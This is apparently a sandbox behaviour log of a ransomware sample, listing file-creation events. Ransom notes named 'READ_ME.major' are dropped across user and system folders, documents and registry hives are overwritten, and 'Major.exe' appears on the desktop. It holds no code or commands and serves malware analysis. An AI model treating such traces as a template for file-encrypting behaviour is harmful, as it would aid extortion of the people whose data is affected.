| Create | \Users\All Users\Microsoft OneDrive\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Oracle\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\regid.1991-06.com.microsoft\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\SoftwareDistribution\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Start Menu\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Templates\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOPrivate\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\WindowsHolographicDevices\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Default.migrated\AppData\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Default.migrated\Documents\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Application Data\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Contacts\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Cookies\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Downloads\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Favorites\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Links\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\My Documents\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\NetHood\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\OneDrive\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\PrintHood\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Recent\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Saved Games\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Searches\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\SendTo\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Start Menu\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Templates\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Videos\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\ntuser.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\ntuser.dat.LOG2 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\ntuser.dat.LOG1 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\NTUSER.DAT | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\AccountPictures\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Desktop\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Documents\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Downloads\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Libraries\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Music\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Pictures\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Videos\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\2052\DWINTL20.DLL | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\dll1\webservices.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\dll1\wdscore.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\dll1\cosqueryxp.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\dll2\webservices.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\amd64\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\i386\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\hwcompatShared.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\Resources\en-US\bootres.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Adobe\ARM\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Microsoft OneDrive\setup\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Oracle\Java\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{3c3aafc8-d898-43ec-998f-965ffdae065a}\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{e52a6842-b0ac-476e-b48f-378a97a67346}\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{f325f05b-f963-4640-a43b-c8a494cdda0f}\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOPrivate\UpdateStore\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\WindowsHolographicDevices\SpatialStore\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Default.migrated\AppData\Local\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Default.migrated\Documents\My Music\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Default.migrated\Documents\My Pictures\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Default.migrated\Documents\My Videos\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\LocalLow\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Contacts\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\PFR2M-o0qt2\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\_ZimOFaG8KXKEpU6r.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\_dVlk.flv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\z777apMJ.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\yjMv7N.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\yfgd0OgsIy.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\XRmOVt9gFML9F.mkv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\uXlL8DYgDEUjN jq7.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\tuYpwDn8lZKFlv_vyIw.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\TqrOwHSCm9aUyso-.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\o8ciyk0NO2XHYoaqmnFR.ots | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\Major.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\LYDmlBGbfl.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\LdMDxx35.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\latl2konSd9A.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\KqwjCn 3Q7SaC_Ku62gF.swf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\jtx871o2rJ.odt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\jR2Fv0O2ExdeRPpH3 jd.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\IzEDH-UkZHZJ5jKxrR.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\ij43ThFEkw0o3b.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\hNyoN.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\gO3FIyJ104fr4GnY98Ix.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\eRtQ2rKaHZAhQ4Oz.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\E0oPk8DHQ2yOUt.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\DjICj.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\D9SKfMGtJgqXnu.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\coRZ.ots | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\bxvFJc_lfxNx.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\bVDiwUgw.swf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\8 -Hgks5NIM-rbJKH6K.pps | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\4m0NEGq.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\3KLok6JTsYbuFF-.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\2TXcsTXc3n5rinGID1V.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\1w5DGI2.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\0tPMP3MycwcUXM.mkv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\cupDn\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\My Music\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\My Pictures\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\My Shapes\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\My Videos\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\Outlook Files\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\QIddoQWl8eDSDIqz\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\SpY7Gp\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\ZMjCG.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\YgcrL70kHEGCGgT_4_.odp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\XxD1.doc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\wfOl4X1xdyW8oqkC8.pptx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\V Aj6iLeWZhqj6eJRUz.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\UeNN9FX.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\q FHylFhBBwVNR4I.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\pxBJNeBYj8E8.pptx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\OkaAfV-IS.pptx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\Ng2e.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\jriFgX.pptx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\JIBSW8f5jqTWsn.pptx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\GlT7X.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\fGn DrSdhzxQj.pps | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\Database1.accdb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\AyyBvwawD-ARD6.odp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\Aimu 7oplbqknXDg_c-Y.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\A6qm.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\9RbroTWMr4.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\7ev7dtTf0pjP8.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\1xl5-3NM9-VoJ7UoNhJ.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\1lz3gxaeg n2ewwWuC6.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Downloads\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Favorites\Links\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Favorites\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
